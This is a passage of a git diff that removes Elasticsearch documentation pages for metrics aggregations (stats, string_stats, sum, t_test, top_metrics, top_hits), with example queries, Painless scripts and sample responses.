-[[scripted-metric-aggregation-parameters]] -==== Other parameters - -[horizontal] -params:: Optional. An object whose contents will be passed as variables to the `init_script`, `map_script` and `combine_script`. This can be - useful to allow the user to control the behavior of the aggregation and for storing state between the scripts. 
If this is not specified, - the default is the equivalent of providing: -+ -[source,js] --------------------------------------------------- -"params" : {} --------------------------------------------------- -// NOTCONSOLE - -[[scripted-metric-aggregation-empty-buckets]] -==== Empty buckets - -If a parent bucket of the scripted metric aggregation does not collect any documents an empty aggregation response will be returned from the -shard with a `null` value. In this case the `reduce_script`'s `states` variable will contain `null` as a response from that shard. -`reduce_script`'s should therefore expect and deal with `null` responses from shards. diff --git a/docs/reference/aggregations/metrics/stats-aggregation.asciidoc b/docs/reference/aggregations/metrics/stats-aggregation.asciidoc deleted file mode 100644 index d02a7ea2a5b..00000000000 --- a/docs/reference/aggregations/metrics/stats-aggregation.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[search-aggregations-metrics-stats-aggregation]] -=== Stats aggregation -++++ -Stats -++++ - -A `multi-value` metrics aggregation that computes stats over numeric values extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script. - -The stats that are returned consist of: `min`, `max`, `sum`, `count` and `avg`. - -Assuming the data consists of documents representing exams grades (between 0 and 100) of students - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { "stats": { "field": "grade" } } - } -} --------------------------------------------------- -// TEST[setup:exams] - -The above aggregation computes the grades statistics over all documents. The aggregation type is `stats` and the `field` setting defines the numeric field of the documents the stats will be computed on. The above will return the following: - - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "grades_stats": { - "count": 2, - "min": 50.0, - "max": 100.0, - "avg": 75.0, - "sum": 150.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`grades_stats` above) also serves as the key by which the aggregation result can be retrieved from the returned response. - -==== Script - -Computing the grades stats based on a script: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "script": { - "lang": "painless", - "source": "doc['grade'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "script": { - "id": "my_script", - "params": { - "field": "grade" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams,stored_example_script] - -===== Value Script - -It turned out that the exam was way above the level of the students and a grade correction needs to be applied. 
We can use a value script to get the new stats: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "field": "grade", - "script": { - "lang": "painless", - "source": "_value * params.correction", - "params": { - "correction": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "field": "grade", - "missing": 0 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `0`. diff --git a/docs/reference/aggregations/metrics/string-stats-aggregation.asciidoc b/docs/reference/aggregations/metrics/string-stats-aggregation.asciidoc deleted file mode 100644 index 41a5283b273..00000000000 --- a/docs/reference/aggregations/metrics/string-stats-aggregation.asciidoc +++ /dev/null @@ -1,223 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-string-stats-aggregation]] -=== String stats aggregation -++++ -String stats -++++ - -A `multi-value` metrics aggregation that computes statistics over string values extracted from the aggregated documents. -These values can be retrieved either from specific `keyword` fields in the documents or can be generated by a provided script. - -WARNING: Using scripts can result in slower search speeds. See -<>. - -The string stats aggregation returns the following results: - -* `count` - The number of non-empty fields counted. -* `min_length` - The length of the shortest term. -* `max_length` - The length of the longest term. -* `avg_length` - The average length computed over all terms. -* `entropy` - The {wikipedia}/Entropy_(information_theory)[Shannon Entropy] value computed over all terms collected by -the aggregation. Shannon entropy quantifies the amount of information contained in the field. It is a very useful metric for -measuring a wide range of properties of a data set, such as diversity, similarity, randomness etc. - -For example: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { "string_stats": { "field": "message.keyword" } } - } -} --------------------------------------------------- -// TEST[setup:messages] - -The above aggregation computes the string statistics for the `message` field in all documents. The aggregation type -is `string_stats` and the `field` parameter defines the field of the documents the stats will be computed on. -The above will return the following: - -[source,console-result] --------------------------------------------------- -{ - ... 
- - "aggregations": { - "message_stats": { - "count": 5, - "min_length": 24, - "max_length": 30, - "avg_length": 28.8, - "entropy": 3.94617750050791 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`message_stats` above) also serves as the key by which the aggregation result can be retrieved from -the returned response. - -==== Character distribution - -The computation of the Shannon Entropy value is based on the probability of each character appearing in all terms collected -by the aggregation. To view the probability distribution for all characters, we can add the `show_distribution` (default: `false`) parameter. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "field": "message.keyword", - "show_distribution": true <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -<1> Set the `show_distribution` parameter to `true`, so that probability distribution for all characters is returned in the results. - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "message_stats": { - "count": 5, - "min_length": 24, - "max_length": 30, - "avg_length": 28.8, - "entropy": 3.94617750050791, - "distribution": { - " ": 0.1527777777777778, - "e": 0.14583333333333334, - "s": 0.09722222222222222, - "m": 0.08333333333333333, - "t": 0.0763888888888889, - "h": 0.0625, - "a": 0.041666666666666664, - "i": 0.041666666666666664, - "r": 0.041666666666666664, - "g": 0.034722222222222224, - "n": 0.034722222222222224, - "o": 0.034722222222222224, - "u": 0.034722222222222224, - "b": 0.027777777777777776, - "w": 0.027777777777777776, - "c": 0.013888888888888888, - "E": 0.006944444444444444, - "l": 0.006944444444444444, - "1": 0.006944444444444444, - "2": 0.006944444444444444, - "3": 0.006944444444444444, - "4": 0.006944444444444444, - "y": 0.006944444444444444 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The `distribution` object shows the probability of each character appearing in all terms. The characters are sorted by descending probability. - -==== Script - -Computing the message string stats based on a script: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "script": { - "lang": "painless", - "source": "doc['message.keyword'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. 
-To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "script": { - "id": "my_script", - "params": { - "field": "message.keyword" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:messages,stored_example_script] - -===== Value Script - -We can use a value script to modify the message (eg we can add a prefix) and compute the new stats: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "field": "message.keyword", - "script": { - "lang": "painless", - "source": "params.prefix + _value", - "params": { - "prefix": "Message: " - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they had a value. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "field": "message.keyword", - "missing": "[empty message]" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -<1> Documents without a value in the `message` field will be treated as documents that have the value `[empty message]`. diff --git a/docs/reference/aggregations/metrics/sum-aggregation.asciidoc b/docs/reference/aggregations/metrics/sum-aggregation.asciidoc deleted file mode 100644 index c7bd15067c2..00000000000 --- a/docs/reference/aggregations/metrics/sum-aggregation.asciidoc +++ /dev/null @@ -1,216 +0,0 @@ -[[search-aggregations-metrics-sum-aggregation]] -=== Sum aggregation -++++ -Sum -++++ - -A `single-value` metrics aggregation that sums up numeric values that are extracted from the aggregated documents. -These values can be extracted either from specific numeric or <> fields in the documents, -or be generated by a provided script. - -Assuming the data consists of documents representing sales records we can sum -the sale price of all hats with: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { "sum": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Resulting in: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "hat_prices": { - "value": 450.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`hat_prices` above) also serves as the key by which the aggregation result can be retrieved from the returned response. 
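-
-A `sum` is also frequently used as a sub-aggregation of a bucket aggregation. As a minimal
-sketch (assuming the same `sales` data set, with its `type` keyword field and numeric `price`
-field), the following would produce one price total per product type:
-
-[source,console]
---------------------------------------------------
-POST /sales/_search?size=0
-{
-  "aggs": {
-    "prices_by_type": {
-      "terms": { "field": "type" },
-      "aggs": {
-        "total_price": { "sum": { "field": "price" } }
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[setup:sales]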
- -==== Script - -We could also use a script to fetch the sales price: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { - "sum": { - "script": { - "source": "doc.price.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { - "sum": { - "script": { - "id": "my_script", - "params": { - "field": "price" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -===== Value Script - -It is also possible to access the field value from the script using `_value`. -For example, this will sum the square of the prices for all hats: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "square_hats": { - "sum": { - "field": "price", - "script": { - "source": "_value * _value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should -be treated. By default documents missing the value will be ignored but it is -also possible to treat them as if they had a value. For example, this treats -all hat sales without a price as being `100`. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { - "sum": { - "field": "price", - "missing": 100 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -[[search-aggregations-metrics-sum-aggregation-histogram-fields]] -==== Histogram fields - -When sum is computed on <>, the result of the aggregation is the sum of all elements in the `values` -array multiplied by the number in the same position in the `counts` array. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs" : { - "total_latency" : { "sum" : { "field" : "latency_histo" } } - } -} --------------------------------------------------- - -For each histogram field the `sum` aggregation will multiply each number in the `values` array <1> multiplied by its associated count -in the `counts` array <2>. 
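-For instance, with the two documents above this works out to
-`0.1 * 3 + 0.2 * 7 + 0.3 * 23 + 0.4 * 12 + 0.5 * 6 = 16.4` for `net-1` and
-`0.1 * 8 + 0.2 * 17 + 0.3 * 8 + 0.4 * 7 + 0.5 * 6 = 12.4` for `net-2`.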
Eventually, it will add all values for all histograms and return the following result: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "total_latency": { - "value": 28.8 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/t-test-aggregation.asciidoc b/docs/reference/aggregations/metrics/t-test-aggregation.asciidoc deleted file mode 100644 index 969ce251041..00000000000 --- a/docs/reference/aggregations/metrics/t-test-aggregation.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-ttest-aggregation]] -=== T-test aggregation -++++ -T-test -++++ - -A `t_test` metrics aggregation that performs a statistical hypothesis test in which the test statistic follows a Student's t-distribution -under the null hypothesis on numeric values extracted from the aggregated documents or generated by provided scripts. In practice, this -will tell you if the difference between two population means are statistically significant and did not occur by chance alone. - -==== Syntax - -A `t_test` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "t_test": { - "a": "value_before", - "b": "value_after", - "type": "paired" - } -} --------------------------------------------------- -// NOTCONSOLE - -Assuming that we have a record of node start up times before and after upgrade, let's look at a t-test to see if upgrade affected -the node start up time in a meaningful way. - -[source,console] --------------------------------------------------- -GET node_upgrade/_search -{ - "size": 0, - "aggs": { - "startup_time_ttest": { - "t_test": { - "a": { "field": "startup_time_before" }, <1> - "b": { "field": "startup_time_after" }, <2> - "type": "paired" <3> - } - } - } -} --------------------------------------------------- -// TEST[setup:node_upgrade] -<1> The field `startup_time_before` must be a numeric field. -<2> The field `startup_time_after` must be a numeric field. -<3> Since we have data from the same nodes, we are using paired t-test. - -The response will return the p-value or probability value for the test. It is the probability of obtaining results at least as extreme as -the result processed by the aggregation, assuming that the null hypothesis is correct (which means there is no difference between -population means). Smaller p-value means the null hypothesis is more likely to be incorrect and population means are indeed different. - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "startup_time_ttest": { - "value": 0.1914368843365979 <1> - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -<1> The p-value. - -==== T-Test Types - -The `t_test` aggregation supports unpaired and paired two-sample t-tests. The type of the test can be specified using the `type` parameter: - -`"type": "paired"`:: performs paired t-test -`"type": "homoscedastic"`:: performs two-sample equal variance test -`"type": "heteroscedastic"`:: performs two-sample unequal variance test (this is default) - -==== Filters - -It is also possible to run unpaired t-test on different sets of records using filters. 
For example, if we want to test the difference
-of startup times before upgrade between two different groups of nodes, we use the same field `startup_time_before` for both
-populations, but separate the two groups of nodes with `term` filters on the group name field:
-
-[source,console]
---------------------------------------------------
-GET node_upgrade/_search
-{
-  "size": 0,
-  "aggs": {
-    "startup_time_ttest": {
-      "t_test": {
-        "a": {
-          "field": "startup_time_before",  <1>
-          "filter": {
-            "term": {
-              "group": "A"  <2>
-            }
-          }
-        },
-        "b": {
-          "field": "startup_time_before",  <3>
-          "filter": {
-            "term": {
-              "group": "B"  <4>
-            }
-          }
-        },
-        "type": "heteroscedastic"  <5>
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[setup:node_upgrade]
-<1> The field `startup_time_before` must be a numeric field.
-<2> Any query that separates two groups can be used here.
-<3> We are using the same field
-<4> but we are using different filters.
-<5> Since we have data from different nodes, we cannot use a paired t-test.
-
-
-[source,console-result]
---------------------------------------------------
-{
-  ...
-
-  "aggregations": {
-    "startup_time_ttest": {
-      "value": 0.2981858007281437 <1>
-    }
-  }
-}
---------------------------------------------------
-// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/]
-<1> The p-value.
-
-In this example, we are using the same fields for both populations. However, this is not a requirement, and different fields and even
-combinations of fields and scripts can be used. Populations don't have to be in the same index either. If data sets are located in different
-indices, a term filter on the <> field can be used to select populations.
-
-==== Script
-
-The `t_test` metric supports scripting. For example, if we need to adjust our load times for the before values, we could use
-a script to recalculate them on-the-fly:
-
-[source,console]
---------------------------------------------------
-GET node_upgrade/_search
-{
-  "size": 0,
-  "aggs": {
-    "startup_time_ttest": {
-      "t_test": {
-        "a": {
-          "script": {
-            "lang": "painless",
-            "source": "doc['startup_time_before'].value - params.adjustment",  <1>
-            "params": {
-              "adjustment": 10  <2>
-            }
-          }
-        },
-        "b": {
-          "field": "startup_time_after"  <3>
-        },
-        "type": "paired"
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[setup:node_upgrade]
-
-<1> The `field` parameter is replaced with a `script` parameter, which uses the
-script to generate the values that the t-test is calculated on.
-<2> Scripting supports parameterized input just like any other script.
-<3> We can mix scripts and fields.
-
diff --git a/docs/reference/aggregations/metrics/top-metrics-aggregation.asciidoc b/docs/reference/aggregations/metrics/top-metrics-aggregation.asciidoc
deleted file mode 100644
index 9b9d5c49b01..00000000000
--- a/docs/reference/aggregations/metrics/top-metrics-aggregation.asciidoc
+++ /dev/null
@@ -1,404 +0,0 @@
-[role="xpack"]
-[testenv="basic"]
-[[search-aggregations-metrics-top-metrics]]
-=== Top metrics aggregation
-++++
-Top metrics
-++++
-
-The `top_metrics` aggregation selects metrics from the document with the largest or smallest "sort"
-value.
For example, this gets the value of the `m` field on the document with the largest value of `s`:
-
-[source,console,id=search-aggregations-metrics-top-metrics-simple]
-----
-POST /test/_bulk?refresh
-{"index": {}}
-{"s": 1, "m": 3.1415}
-{"index": {}}
-{"s": 2, "m": 1.0}
-{"index": {}}
-{"s": 3, "m": 2.71828}
-POST /test/_search?filter_path=aggregations
-{
-  "aggs": {
-    "tm": {
-      "top_metrics": {
-        "metrics": {"field": "m"},
-        "sort": {"s": "desc"}
-      }
-    }
-  }
-}
-----
-
-Which returns:
-
-[source,js]
-----
-{
-  "aggregations": {
-    "tm": {
-      "top": [ {"sort": [3], "metrics": {"m": 2.718280076980591 } } ]
-    }
-  }
-}
-----
-// TESTRESPONSE
-
-`top_metrics` is fairly similar to <>
-in spirit, but because it is more limited it is able to do its job using less memory and is often
-faster.
-
-==== `sort`
-
-The `sort` field in the metric request functions exactly the same as the `sort` field in the
-<> request except:
-
-* It can't be used on <>, <>, <>,
-<>, or <> fields.
-* It only supports a single sort value, so which document wins ties is not specified.
-
-The metrics that the aggregation returns are taken from the first hit that would be returned by the search
-request. So,
-
-`"sort": {"s": "desc"}`:: gets metrics from the document with the highest `s`
-`"sort": {"s": "asc"}`:: gets the metrics from the document with the lowest `s`
-`"sort": {"_geo_distance": {"location": "35.7796, -78.6382"}}`::
-  gets metrics from the documents with `location` *closest* to `35.7796, -78.6382`
-`"sort": "_score"`:: gets metrics from the document with the highest score
-
-==== `metrics`
-
-`metrics` selects the fields of the "top" document to return. You can request
-a single metric with something like `"metrics": {"field": "m"}` or multiple
-metrics by requesting a list of metrics like `"metrics": [{"field": "m"}, {"field": "i"}]`.
-Here is a more complete example:
-
-[source,console,id=search-aggregations-metrics-top-metrics-list-of-metrics]
-----
-PUT /test
-{
-  "mappings": {
-    "properties": {
-      "d": {"type": "date"}
-    }
-  }
-}
-POST /test/_bulk?refresh
-{"index": {}}
-{"s": 1, "m": 3.1415, "i": 1, "d": "2020-01-01T00:12:12Z"}
-{"index": {}}
-{"s": 2, "m": 1.0, "i": 6, "d": "2020-01-02T00:12:12Z"}
-{"index": {}}
-{"s": 3, "m": 2.71828, "i": -12, "d": "2019-12-31T00:12:12Z"}
-POST /test/_search?filter_path=aggregations
-{
-  "aggs": {
-    "tm": {
-      "top_metrics": {
-        "metrics": [
-          {"field": "m"},
-          {"field": "i"},
-          {"field": "d"}
-        ],
-        "sort": {"s": "desc"}
-      }
-    }
-  }
-}
-----
-
-Which returns:
-
-[source,js]
-----
-{
-  "aggregations": {
-    "tm": {
-      "top": [ {
-        "sort": [3],
-        "metrics": {
-          "m": 2.718280076980591,
-          "i": -12,
-          "d": "2019-12-31T00:12:12.000Z"
-        }
-      } ]
-    }
-  }
-}
-----
-// TESTRESPONSE
-
-==== `size`
-
-`top_metrics` can return the top few documents' worth of metrics using the `size` parameter:
-
-[source,console,id=search-aggregations-metrics-top-metrics-size]
-----
-POST /test/_bulk?refresh
-{"index": {}}
-{"s": 1, "m": 3.1415}
-{"index": {}}
-{"s": 2, "m": 1.0}
-{"index": {}}
-{"s": 3, "m": 2.71828}
-POST /test/_search?filter_path=aggregations
-{
-  "aggs": {
-    "tm": {
-      "top_metrics": {
-        "metrics": {"field": "m"},
-        "sort": {"s": "desc"},
-        "size": 3
-      }
-    }
-  }
-}
-----
-
-Which returns:
-
-[source,js]
-----
-{
-  "aggregations": {
-    "tm": {
-      "top": [
-        {"sort": [3], "metrics": {"m": 2.718280076980591 } },
-        {"sort": [2], "metrics": {"m": 1.0 } },
-        {"sort": [1], "metrics": {"m": 3.1414999961853027 } }
-      ]
-    }
-  }
-}
-----
-// TESTRESPONSE
-
-The default `size` is 1.
The maximum default size is `10` because the aggregation's
-working storage is "dense", meaning we allocate `size` slots for every bucket. `10`
-is a *very* conservative default maximum and you can raise it if you need to by
-changing the `top_metrics_max_size` index setting. But know that large sizes can
-take a fair bit of memory, especially if they are inside of an aggregation which
-makes many buckets like a large
-<>. If
-you still want to raise it, use something like:
-
-[source,console]
-----
-PUT /test/_settings
-{
-  "top_metrics_max_size": 100
-}
-----
-// TEST[continued]
-
-NOTE: If `size` is more than `1` the `top_metrics` aggregation can't be the *target* of a sort.
-
-==== Examples
-
-[[search-aggregations-metrics-top-metrics-example-terms]]
-===== Use with terms
-
-This aggregation should be quite useful inside of the <>
-aggregation, to, say, find the last value reported by each server.
-
-[source,console,id=search-aggregations-metrics-top-metrics-terms]
-----
-PUT /node
-{
-  "mappings": {
-    "properties": {
-      "ip": {"type": "ip"},
-      "date": {"type": "date"}
-    }
-  }
-}
-POST /node/_bulk?refresh
-{"index": {}}
-{"ip": "192.168.0.1", "date": "2020-01-01T01:01:01", "m": 1}
-{"index": {}}
-{"ip": "192.168.0.1", "date": "2020-01-01T02:01:01", "m": 2}
-{"index": {}}
-{"ip": "192.168.0.2", "date": "2020-01-01T02:01:01", "m": 3}
-POST /node/_search?filter_path=aggregations
-{
-  "aggs": {
-    "ip": {
-      "terms": {
-        "field": "ip"
-      },
-      "aggs": {
-        "tm": {
-          "top_metrics": {
-            "metrics": {"field": "m"},
-            "sort": {"date": "desc"}
-          }
-        }
-      }
-    }
-  }
-}
-----
-
-Which returns:
-
-[source,js]
-----
-{
-  "aggregations": {
-    "ip": {
-      "buckets": [
-        {
-          "key": "192.168.0.1",
-          "doc_count": 2,
-          "tm": {
-            "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 2 } } ]
-          }
-        },
-        {
-          "key": "192.168.0.2",
-          "doc_count": 1,
-          "tm": {
-            "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 3 } } ]
-          }
-        }
-      ],
-      "doc_count_error_upper_bound": 0,
-      "sum_other_doc_count": 0
-    }
-  }
-}
-----
-// TESTRESPONSE
-
-Unlike `top_hits`, you can sort buckets by the results of this metric:
-
-[source,console]
-----
-POST /node/_search?filter_path=aggregations
-{
-  "aggs": {
-    "ip": {
-      "terms": {
-        "field": "ip",
-        "order": {"tm.m": "desc"}
-      },
-      "aggs": {
-        "tm": {
-          "top_metrics": {
-            "metrics": {"field": "m"},
-            "sort": {"date": "desc"}
-          }
-        }
-      }
-    }
-  }
-}
-----
-// TEST[continued]
-
-Which returns:
-
-[source,js]
-----
-{
-  "aggregations": {
-    "ip": {
-      "buckets": [
-        {
-          "key": "192.168.0.2",
-          "doc_count": 1,
-          "tm": {
-            "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 3 } } ]
-          }
-        },
-        {
-          "key": "192.168.0.1",
-          "doc_count": 2,
-          "tm": {
-            "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 2 } } ]
-          }
-        }
-      ],
-      "doc_count_error_upper_bound": 0,
-      "sum_other_doc_count": 0
-    }
-  }
-}
-----
-// TESTRESPONSE
-
-===== Mixed sort types
-
-Sorting `top_metrics` by a field that has different types across different
-indices produces somewhat surprising results: floating point fields are
-always sorted independently of whole numbered fields.
- -[source,console,id=search-aggregations-metrics-top-metrics-mixed-sort] ----- -POST /test/_bulk?refresh -{"index": {"_index": "test1"}} -{"s": 1, "m": 3.1415} -{"index": {"_index": "test1"}} -{"s": 2, "m": 1} -{"index": {"_index": "test2"}} -{"s": 3.1, "m": 2.71828} -POST /test*/_search?filter_path=aggregations -{ - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"s": "asc"} - } - } - } -} ----- - -Which returns: - -[source,js] ----- -{ - "aggregations": { - "tm": { - "top": [ {"sort": [3.0999999046325684], "metrics": {"m": 2.718280076980591 } } ] - } - } -} ----- -// TESTRESPONSE - -While this is better than an error it *probably* isn't what you were going for. -While it does lose some precision, you can explictly cast the whole number -fields to floating points with something like: - -[source,console] ----- -POST /test*/_search?filter_path=aggregations -{ - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"s": {"order": "asc", "numeric_type": "double"}} - } - } - } -} ----- -// TEST[continued] - -Which returns the much more expected: - -[source,js] ----- -{ - "aggregations": { - "tm": { - "top": [ {"sort": [1.0], "metrics": {"m": 3.1414999961853027 } } ] - } - } -} ----- -// TESTRESPONSE diff --git a/docs/reference/aggregations/metrics/tophits-aggregation.asciidoc b/docs/reference/aggregations/metrics/tophits-aggregation.asciidoc deleted file mode 100644 index 4136868d4ba..00000000000 --- a/docs/reference/aggregations/metrics/tophits-aggregation.asciidoc +++ /dev/null @@ -1,422 +0,0 @@ -[[search-aggregations-metrics-top-hits-aggregation]] -=== Top hits aggregation -++++ -Top hits -++++ - -A `top_hits` metric aggregator keeps track of the most relevant document being aggregated. This aggregator is intended -to be used as a sub aggregator, so that the top matching documents can be aggregated per bucket. - -TIP: We do not recommend using `top_hits` as a top-level aggregation. If you -want to group search hits, use the <> -parameter instead. - -The `top_hits` aggregator can effectively be used to group result sets by certain fields via a bucket aggregator. -One or more bucket aggregators determines by which properties a result set get sliced into. - -==== Options - -* `from` - The offset from the first result you want to fetch. -* `size` - The maximum number of top matching hits to return per bucket. By default the top three matching hits are returned. -* `sort` - How the top matching hits should be sorted. By default the hits are sorted by the score of the main query. - -==== Supported per hit features - -The top_hits aggregation returns regular search hits, because of this many per hit features can be supported: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -IMPORTANT: If you *only* need `docvalue_fields`, `size`, and `sort` then -<> might be a more efficient choice than the Top Hits Aggregation. - -`top_hits` does not support the <> parameter. Query rescoring -applies only to search hits, not aggregation results. To change the scores used -by aggregations, use a <> or -<> query. - -==== Example - -In the following example we group the sales by type and per type we show the last sale. -For each sale only the date and price fields are being included in the source. 
- -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "top_tags": { - "terms": { - "field": "type", - "size": 3 - }, - "aggs": { - "top_sales_hits": { - "top_hits": { - "sort": [ - { - "date": { - "order": "desc" - } - } - ], - "_source": { - "includes": [ "date", "price" ] - }, - "size": 1 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Possible response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "top_tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "hat", - "doc_count": 3, - "top_sales_hits": { - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "sales", - "_type": "_doc", - "_id": "AVnNBmauCQpcRyxw6ChK", - "_source": { - "date": "2015/03/01 00:00:00", - "price": 200 - }, - "sort": [ - 1425168000000 - ], - "_score": null - } - ] - } - } - }, - { - "key": "t-shirt", - "doc_count": 3, - "top_sales_hits": { - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "sales", - "_type": "_doc", - "_id": "AVnNBmauCQpcRyxw6ChL", - "_source": { - "date": "2015/03/01 00:00:00", - "price": 175 - }, - "sort": [ - 1425168000000 - ], - "_score": null - } - ] - } - } - }, - { - "key": "bag", - "doc_count": 1, - "top_sales_hits": { - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "sales", - "_type": "_doc", - "_id": "AVnNBmatCQpcRyxw6ChH", - "_source": { - "date": "2015/01/01 00:00:00", - "price": 150 - }, - "sort": [ - 1420070400000 - ], - "_score": null - } - ] - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/AVnNBmauCQpcRyxw6ChK/$body.aggregations.top_tags.buckets.0.top_sales_hits.hits.hits.0._id/] -// TESTRESPONSE[s/AVnNBmauCQpcRyxw6ChL/$body.aggregations.top_tags.buckets.1.top_sales_hits.hits.hits.0._id/] -// 